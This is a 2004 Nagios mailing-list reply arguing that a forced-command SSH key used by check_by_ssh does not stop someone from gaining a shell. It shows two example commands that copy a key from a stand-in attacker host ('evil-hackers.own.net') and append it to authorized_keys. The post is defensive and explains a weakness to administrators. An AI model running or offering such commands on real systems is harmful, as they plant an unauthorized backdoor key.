check_by_ssh question

Andreas Ericsson ae at op5.se
Thu Mar 25 22:11:18 CET 2004

Previous message: check_by_ssh question
Next message: check_by_ssh question
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Matt Pounsett wrote:
> 
> True.  But you can prevent the key from being used to get an interactive
> shell, which was my point.
> 
Yes you can, actually, since you can still run commands on it.
The 'command' option in the keyfile can only specify one, and exactly 
one command to run when a user is authenticated using that precise key, 
so it can't be set to block certain commands (which is good, since 
inclusive permissions are always harder to bypass than exclusive).
In theory, this prevents us from obtaining a shell, but consider the 
following commands being run;
ssh target -C \
"scp <no-passwd-user>@evil-hackers.own.net:.ssh/id_dsa.pub 
.ssh/unrestricted_auth_key"
ssh target -C "cat .ssh/unrestricted_auth_key >> .ssh/authorized_keys"

And please, don't tell me "that can't happen, cause you can configure 
ssh to not be allowed to login without a password". It's totally 
possible to generate a new set of keys for the pseudo-user, copy it to 
your own hosts authorized_keys and then take it from there. No 'noauth' 
logins have to take place, but the unrestricted_auth_key still goes into 
the authorized_keys file. Voila. Shell access.

This CAN ofcourse be bypassed by setting up a horde of different keys 
and specifying the exact command to be run when that particular user 
logs in with the particular private key, but then configuration would be 
such a hassle that I'd be surprised if something didn't fuck up totally 
anyways.

Questions about that?

Hmm... I think I'll start working on ssh style encryption (dsa) for 
nrpe, with public / private key handshake and so on. Seems a bit easier 
than all this hassle.

-- 
Sourcerer / Andreas Ericsson
OP5 AB
+46 (0)733 709032
andreas.ericsson at op5.se

-------------------------------------------------------
This SF.Net email is sponsored by: IBM Linux Tutorials
Free Linux tutorial presented by Daniel Robbins, President and CEO of
GenToo technologies. Learn everything from fundamentals to system
administration.http://ads.osdn.com/?ad_id=1470&alloc_id=3638&op=click
_______________________________________________
Nagios-users mailing list
Nagios-users at lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/nagios-users
::: Please include Nagios version, plugin version (-v) and OS when reporting any issue. 
::: Messages without supporting info will risk being sent to /dev/null

Previous message: check_by_ssh question
Next message: check_by_ssh question
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

More information about the Users mailing list